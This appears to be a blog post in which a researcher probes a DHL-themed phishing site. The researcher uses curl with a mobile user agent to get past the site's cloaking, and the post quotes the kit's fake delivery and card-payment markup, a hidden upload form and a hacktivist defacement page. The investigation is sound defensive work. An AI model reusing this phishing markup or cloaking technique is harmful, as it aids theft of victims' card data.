style="display:inline-block;width:300px;height:600px"
data-ad-client="ca-pub-9213903473290312"
data-ad-slot="3628706829"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>
The next suspicous artifact found in one of the URLs
$ curl -X GET hxxps[://]merchspace[.]co/bpz7/x/
404 Not Found
If we instead send the User agent string of a mobile device again:
$ curl -A “Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1” -L hxxps[://]merchspace[.]co/bpz7/x/
Outputs some interesting tags:
<link rel="icon" type="image/x-icon" href="./X911/favicon.ico" />
<img src="./X911/dhl-logo.svg">
<img src="./X911/SE.png" style=" width: 40px;"></span>
<a href="./A.php?Billi=1#KJSDKJhjghtyuUJSUSQUIQSIklklsisiiIUZIUZEJQSJkkjsJSJS" class="wide-button">Återuppta leverans</a>
<iframe id="cross-domain-store-server-iframe" src="./X911/adrum-xd.99c2fcc5ccc30ea4d38a1a74eeb7a6a6.html" width="0" height="0" tabindex="-1" title="empty" style="display: none;"></iframe></div>
A.php?Billi=1#KJSDKJhjghtyuUJSUSQUIQSIklklsisiiIUZIUZEJQSJkkjsJSJS
Defines a query parameter and a possible anchor to an action or the specific form below
Visual of the link:
If we enter all the information and heading next brings us to a similar page as above but asking for credit card info to pay.
hxxps[://]merchspace[.]co/bpz7/x/98328GH/B[.]php?cred=1#sHFHJHDHDHKJDJDSDSJDSJKJDSJDSDJJDSHYKJHGFG
This submit throws an error message about wrong credit card number.
BUT i did find a POST request on a form button pointing to another directory: hxxps[://]merchspace[.]co/bpz7/x/98328GH/siftA/
Which the directory led to the following:
This shows a fake “This page isn’t working” and a broken Reload button.
But there is a hidden form which has a button that triggers an function.
So if we enter the Console tab and writes:
showUploadForm()
The hidden form will appear and the file upload works!
What is the purpose with this? Is the information credit card uploaded as a file? How, why don’t know.
Let’s check the img src folder ./X911/
$ curl -A “Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1” -L hxxps[://]merchspace[.]co/bpz7/x/x911
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta property="og:image" content="https://i.ibb.co/McFKVJp/20231031-211747-0000.png">
<meta property="og:title" content="H4CKED BY DANDIER | CYBER ERROR SYSTEM">
<meta property="og:description" content="this site been hacked by dandier C.E.S, fuck you india">
<meta name='description' content='H4cked by Dandier'/>
<meta name='keywords' content='H4cked by Dandier'/>
<meta name='Abstract' content='H4cked by Dandier'/>
<meta name="title" content="H4cked? By Dandier"/>
<meta name="googlebot" content="index,follow"/>
<meta name="robots" content="all"/>
<meta name="robots schedule" content="auto"/>
<meta name="distribution" content="global"/>
<meta name="author" content="Dandier"/>
<meta name="robots" content="index,follow"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:description" content="Whoopz Dandier Was Here">
<title>H4cked By Dandier</title>
<link href="https://i.imgur.com/jr4XB3z.png" rel="shortcut icon">
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
<base target="_blank"/>
<meta name="description" content="#cybererrorsystem">
<link href="https://fonts.googleapis.com/css2?family=Oxygen" rel="stylesheet">
</head>
<body>
<style>
html {
background-color: black;
color: #000;
}
h2 {
font-family:"Bold 700 Italic",Mali;
color:red;
}
h3, h4 {
font-family:"Oxygen",serif;
color:white;
}
a {
color: white;
text-decoration: none;
}
::selection {
color:white;
background:#000;
}
</style>
<table width="100%" height="100%">
<td align="center">
<img alt="#FUCKZIONIS" src="https://i.ibb.co/McFKVJp/20231031-211747-0000.png" width="250px">
<h2>HACKED BY DANDIER</h2>
<h4> WE ARE CYBER ERROR SYSTEM <br><br>AS LONG AS THE INDEPENDENCE OF THE PALESTINE PEOPLE HAS NOT BEEN DELIVERED TO THE PALESTINE PEOPLE,<br>THEN THE INDONESIAN PEOPLE WILL STAND UP AND CHALLENGE THE ISRAEL COLONIZERS.</ins><br></h4>
<h2> <a href="https://t.me/cybererrorsystem" >#OpCanada #OpItaly #OpIsrael #OpIsrahell #OpUSA<br> #OpUK #OpIndia #OpFrance #OpUkraine #OpJapan</a></h2>
<audio controls="controls" src="https://kosred.com/a/grcros.mp3"></audio>
<h4>- <font color="white">Greetz</font> -<br>Hacktivist Indonesia - Garuda Security - Ganosec Team - Infinity Insight - Malang Blackhat - Surabaya Hacktivist<br>GB-Anon17 - Cyber Sederhana Team - Hizbullah Cyber Team - Estem Restoration Eagle - Anonymous X </h4>
<h3>- <font color="red">C-E-S-TEAM</font> -<br>Fakesite - Doys_404 - Anon_lx02 - Fakesec666 - Iethesia - SukaJanda01 - Qyuraa - Enter666x - NoFace999 - Lanzz - Xzuvuww - XybaXploite - Vurex - Dandier - Xstroven - BigBoy - AgenMassive - KingArtur - IvanApolloyon - Amixploite - Machfood - Rsyiddz - Fedup_404 - UniCorn</h3>
</body>
</html>
This landing page is being forced on several locations on the domain.
Are these two connected?
End.